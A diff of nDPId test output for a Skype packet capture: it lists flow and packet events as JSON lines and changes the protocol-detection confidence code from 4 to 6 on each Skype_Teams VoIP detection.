00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":607,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.39","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":607,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1431970649777,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970649777,"pkt":"0NQSxnP1PBXCt3IOCABFAABAx6cAAEARH9zAqAEinTg0JzLdnF8ALF\/teucC9OsZNQfegPGKe6bjID0chTfhFg98J57+zrR\/SJSxjuh7"} -00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":607,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.39","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":607,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.39","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":608,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649778,"flow_last_seen":1431970649778,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970649778,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.25","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":608,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1431970649778,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431970649778,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+a34AAEARfBXAqAEinTg0GTLdnEoAKvPOeukCU4Ora98LBiEx3upKt3C\/idNCTbgKHnJdEXlx5pIWdA=="} -00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":608,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649778,"flow_last_seen":1431970649778,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970649778,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.25","src_port":13021,"dst_port":40010,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":608,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649778,"flow_last_seen":1431970649778,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970649778,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.25","src_port":13021,"dst_port":40010,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":620,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1431970649858,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970649858,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+iadN+uTwKgBIpxByCKHTehVD6e9gKASOJCRTQAAAgQFrAQCCApMYEY4PjHBiQEDAwk="} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":621,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1431970649858,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970649858,"pkt":"0NQSxnP1PBXCt3IOCABFAAA05xhAAEAGCRbAqAEinTfrk8ginEEPp72Ah03oVoAQECzoKAAAAQEICj4xwdhMYEY4"} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":623,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1431970649908,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970649908,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGYo1BN98twKgBIpxJyCPPJ6UGmuYcsaASOJBnJAAAAgQFrAQCCApNlOiPPjHBiQEDAwk="} @@ -257,19 +257,19 @@ 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":644,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1431970650785,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970650785,"pkt":"0NQSxnP1PBXCt3IOCABFAABAQ6lAAEAGFV3AqAEinTeCsMglnFZwrI8vAAAAALAC\/\/\/tTwAAAgQFtAEDAwUBAQgKPjHFcQAAAAAEAgAA"} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":645,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970650786,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.28","src_port":13021,"dst_port":40014,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":645,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1431970650786,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970650786,"pkt":"0NQSxnP1PBXCt3IOCABFAAA8ax0AAEARLXbAqAEiQTffHDLdnE4AKA\/ueusCO4\/2IMsd1vZVtYtrG4KJHI0MKaf\/zYcpuYfyCTg="} -00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":645,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970650786,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.28","src_port":13021,"dst_port":40014,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":645,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970650786,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.28","src_port":13021,"dst_port":40014,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":646,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970650786,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.154","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":646,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1431970650786,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970650786,"pkt":"0NQSxnP1PBXCt3IOCABFAAA02DgAAEARwOTAqAEinTeCmjLdnE0AIDT4eu0C9+f6EdNHv7hYXHZqXAueiqwkwiBF"} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":646,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970650786,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.154","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":646,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970650786,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.154","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":647,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970650786,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.44","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":647,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1431970650786,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431970650786,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+20MAAEARvT3AqAEiQTffLDLdnFQAKsWAeu8CRodfDjWwQgXB9ThlvK8WB1Z6kJ0K1lKVKQH1\/lgrJA=="} -00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":647,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970650786,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.44","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":647,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970650786,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.44","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":648,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970650786,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.173","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":648,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1431970650786,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431970650786,"pkt":"0NQSxnP1PBXCt3IOCABFAAA++5AAAEARZaPAqAEiQAQXrTLdnFEAKkiDevECuUkWpyPJriCjpMdyVTxdl5EcBPkRY6\/lJZGF7hytnA=="} -00669{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":648,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970650786,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.173","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00669{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":648,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970650786,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.173","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":649,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970650786,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.154","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":649,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1431970650786,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970650786,"pkt":"0NQSxnP1PBXCt3IOCABFAABA\/bcAAEARMcnAqAEi1cezmjLdnFEALEFuevMCLFThLGMqgdMtKoErvKHNoLTdO9PKUomxAAk6+9gobSzp"} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":649,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970650786,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.154","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":649,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970650786,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.154","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":650,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1431970650909,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970650909,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYgqdN4KwwKgBIpxWyCXC803gcKyPMKASOJCo1gAAAgQFrAQCCApOqL1kPjHFcQEDAwk="} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":651,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":1431970650910,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970650910,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0eB9AAEAG4PLAqAEinTeCsMglnFZwrI8wwvNN4YAQECz\/hAAAAQEICj4xxe1OqL1k"} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":658,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651380,"flow_last_seen":1431970651380,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970651380,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":51238,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -286,102 +286,102 @@ 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":674,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":3,"flow_last_seen":1431970651677,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970651677,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0CgxAAEAGtOPAqAEib91KLcgoAbtIes+zDU2rDIAQECxN5QAAAQEICj4xyOdNh63L"} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":680,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970651850,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":680,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1431970651850,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1431970651850,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9fnAAAEARsRvAqAEi1cezkjLdgQkAKdgxevUC7H9CpX1vDFjUgifamALKVmn9IG\/Fgz6DNfXKD8OP"} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":680,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970651850,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":680,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970651850,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":681,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970651850,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.160","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":681,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1431970651850,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431970651850,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/x4wAAEARZ+\/AqAEi1cezoDLdnF4AKxOyevcCGvABkprWeh8EUhOC0BCTnmpfRyuj2xsq6jfI1V+MUC4="} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":681,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970651850,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.160","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":681,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970651850,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.160","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":682,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970651850,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.12","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 